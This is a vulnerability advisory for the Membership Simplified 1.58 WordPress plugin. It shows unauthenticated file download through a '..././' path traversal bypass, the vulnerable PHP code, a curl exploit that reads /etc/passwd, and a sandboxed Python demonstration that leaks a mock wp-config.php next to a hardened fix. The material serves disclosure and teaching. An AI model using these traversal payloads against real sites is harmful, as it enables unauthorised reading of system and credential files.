WordPress Membership Simplified 1.58 Arbitrary File Download

2017.03.17
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Arbitrary file download vulnerability in WordPress Plugin Membership Simplified v1.58
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-13
CVE-ID: [CVE-2017-1002008]
Download Site: https://wordpress.org/plugins/membership-simplified-for-oap-members-only
Vendor: https://profiles.wordpress.org/williamdeangelis/
Vendor Notified: 2017-03-13
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=187

Description: Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.

Vulnerability: The file download code in membership-simplified-for-oap-members-only/download.php does not check whether the requester is logged in or has download privileges, so the endpoint is reachable by any unauthenticated remote user. The path check on line 5 is a single, non-recursive str_replace() of "../" with the empty string. Because str_replace() does not re-scan the text it produces, a request containing the pattern "..././" is reduced to "../" after one pass; the attacker therefore still gets the traversal sequence in $fullPath and can read any file the web server process can open:

 3 $path = substr(getcwd(), 0, -50). "uploads/membership-simplified-for-oap-members-only/"; // change the path to fit your websites document structure
 4 $fullPath = $path.$_GET['download_file'];
 5 $fullPath = str_replace("../","",$fullPath);
 6
 7 if ($fd = fopen($fullPath, "r")) {
 8   $fsize = filesize($fullPath);
 9   $path_parts = pathinfo($fullPath);
10   $ext = strtolower($path_parts["extension"]);
11   switch ($ext) {
12     case "pdf":
13       header("Content-type: application/pdf"); // add here more headers for diff. extensions
14       header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download
15       break;
16     default;
17       header("Content-type: application/octet-stream");
18       header("Content-Disposition: filename=\"".$path_parts["basename"]."\"");
19   }
20   header("Content-length: $fsize");
21   header("Cache-control: private"); //use this to open files directly
22   while(!feof($fd)) {
23     $buffer = fread($fd, 2048);
24     echo $buffer;

Exploit Code:

$ curl "http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd"
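The following Python script is an added example, not code from the plugin, the vendor or the advisory author. It mirrors lines 3 to 5 of download.php (concatenate the uploads directory with the request parameter, then strip "../" in one pass) to show why the naive "../../" payload is neutralised while "..././" survives, and it contrasts that with a hypothetical hardened handler that requires a logged-in user, accepts only a bare file name and checks the canonical path against the uploads directory. The directory tree, the lesson file and the wp-config.php with a fake secret are constructed in a temporary directory so the script runs offline; the function names and the hardening strategy are this example's own assumptions, not the vendor's fix.

```python
import os
import tempfile

# Constructed sandbox (not a real WordPress tree): an uploads directory with one
# legitimate lesson file, and a sensitive file two levels above it that the
# download endpoint must never serve. UPLOADS stands in for the plugin's $path.
ROOT = tempfile.mkdtemp(prefix="ms-demo-")
UPLOADS = os.path.join(ROOT, "uploads", "membership-simplified-for-oap-members-only")
os.makedirs(UPLOADS)
with open(os.path.join(UPLOADS, "lesson1.pdf"), "w") as fh:
    fh.write("%PDF-1.4 lesson content\n")
with open(os.path.join(ROOT, "wp-config.php"), "w") as fh:
    fh.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")


def vulnerable_full_path(download_file):
    """Mirror of download.php lines 3-5: concatenate, then strip '../' once.

    str.replace(), like PHP's str_replace(), is a single left-to-right pass and
    does not re-scan the text it produces, so '..././' collapses to '../'.
    """
    full_path = UPLOADS + "/" + download_file   # line 4: $path.$_GET['download_file']
    return full_path.replace("../", "")         # line 5: str_replace("../", "", $fullPath)


def vulnerable_download(download_file):
    """What the unauthenticated endpoint hands back: the raw file contents."""
    with open(vulnerable_full_path(download_file), "r") as fh:
        return fh.read()


def inside_directory(base, target):
    """True if the canonical target lies under the canonical base directory.

    realpath() resolves '..' segments and symlinks before the comparison, so
    neither a traversal sequence nor a planted symlink can escape base.
    """
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def hardened_download(download_file, logged_in):
    """Hypothetical replacement for download.php (this example's own design).

    1. Require an authenticated user (the original has no check at all).
    2. Accept only a bare file name: any separator or dot-dot component is
       rejected outright instead of being 'cleaned'.
    3. Verify the canonical path stays inside UPLOADS as a second layer.
    """
    if not logged_in:
        raise PermissionError("login required")
    if download_file in ("", ".", "..") or os.path.basename(download_file) != download_file:
        raise ValueError("only a bare file name is accepted")
    target = os.path.join(UPLOADS, download_file)
    if not inside_directory(UPLOADS, target):
        raise ValueError("path escapes the uploads directory")
    with open(target, "r") as fh:
        return fh.read()


def outcome(download_file, logged_in=True):
    """Summarise hardened_download() for a request: 'served', 'denied' or 'rejected'."""
    try:
        hardened_download(download_file, logged_in)
    except PermissionError:
        return "denied"
    except (ValueError, FileNotFoundError):
        return "rejected"
    return "served"


if __name__ == "__main__":
    bypass = "..././..././wp-config.php"
    print("naive payload  ->", vulnerable_full_path("../../wp-config.php"))
    print("bypass payload ->", vulnerable_full_path(bypass))
    print("vulnerable endpoint leaks:", vulnerable_download(bypass).strip())
    print("hardened, same payload:", outcome(bypass))
    print("hardened, lesson1.pdf:", outcome("lesson1.pdf"))
    print("hardened, anonymous:", outcome("lesson1.pdf", logged_in=False))
```

Two design points matter here. Looping str_replace() until the string stops changing would close the "..././" hole but still leaves absolute paths, symlinks under the uploads directory and the missing authentication check unaddressed; rejecting anything that is not a bare file name and then comparing canonicalised paths handles all three. The real plugin also sends the file with fopen()/fread() as the web server user, so the blast radius of the vulnerable version is every file that user can read, not just the uploads directory.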


Copyright 2017, cxsecurity.com